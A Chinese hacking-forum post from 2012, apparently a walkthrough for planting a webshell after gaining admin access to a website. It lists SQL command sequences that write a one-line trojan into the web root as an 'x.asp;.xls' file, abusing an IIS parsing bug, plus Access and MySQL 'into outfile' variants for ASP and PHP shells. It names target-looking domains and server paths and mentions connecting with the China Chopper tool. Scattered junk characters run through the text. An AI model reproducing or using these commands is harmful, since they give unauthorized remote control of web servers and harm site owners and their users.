好不容易进了后台,发现啥上传啊。备份啊多木有。1 }9 v2 T2 u4 P
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的* R5 j; r, K5 z
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
# \" i: j `1 g! R然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
& Q! a4 }# @' u4 T& W1.create table cmd (a varchar(50))
: N E8 H1 L X6 Y" g3 y2.insert into cmd (a) values (‘‘)
: k1 {8 w; S8 P- y7 Y) p; N$ Y3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
' Y" s" \9 T5 _(把表cmd的内容导出为物理路径的一个EXCEL文件)
6 `, H8 r; ?9 s" m& m4.drop table cmd
' C! q3 [7 h- k2 ~% m0 u利用IIS的BUG成功拿到了WEBSHELL。' @. b& f4 ]* }! H ]; ~
6 h0 s5 n" Z! n( Y8 R直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话# D! j! [/ U; f2 T+ I1 v2 a: G
! E1 J5 Z0 Q' X0 h
SQL语句意思解释:+ i# M) i% u, ]9 d
第一句; B9 g* x: B0 E( g0 D
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
5 f/ h: a0 ]: f# z" m2 i- L$ J8 r# t' k, {9 ]/ ]* \; k) w1 N
第二句
* k# G e! O: p) D2 o# J 在表cmd的a字段插入一句话木马
$ r8 Z3 s4 x# Z( Q* P" l: f# m 第三句+ A0 u/ l% y! E+ \! X
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件. x# D# F7 A# ~! z0 F$ W$ G1 E
5 T z' u# a+ a( O+ I5 h
第四句2 T; f0 t' L, x( V1 c- X7 h; i8 X H
删除建立的cmd表7 F. V8 I1 O) m
, `. z, \9 ?+ v* q! s& O' y) q$ k 以下内容为测试:
8 N9 m, R, D# R Access利用后台SQL执行命令功能导出WebShell:. p3 W$ A G4 f1 [6 E! h: b
这个更简单:
6 q$ c2 u% Z1 s5 ^* L' U2 r4 c [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
1 b0 M9 K* X, y: G: w- m/ x 或者4 r) Y. w/ b( M0 z1 u
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]8 p' d9 W' i; l& f7 L! l5 X
: V/ w1 [; B7 D0 e* S: h
后台有执行SQL语句功能(vote为已知表段)
7 h. `! x5 S- i 希望对大家有所帮助拿shell的又一个思路
0 V! B2 J6 H( T) _' Z, Q3 [! I: E/ F |
发表于 2012-9-13 17:53:58
收藏
支持
反对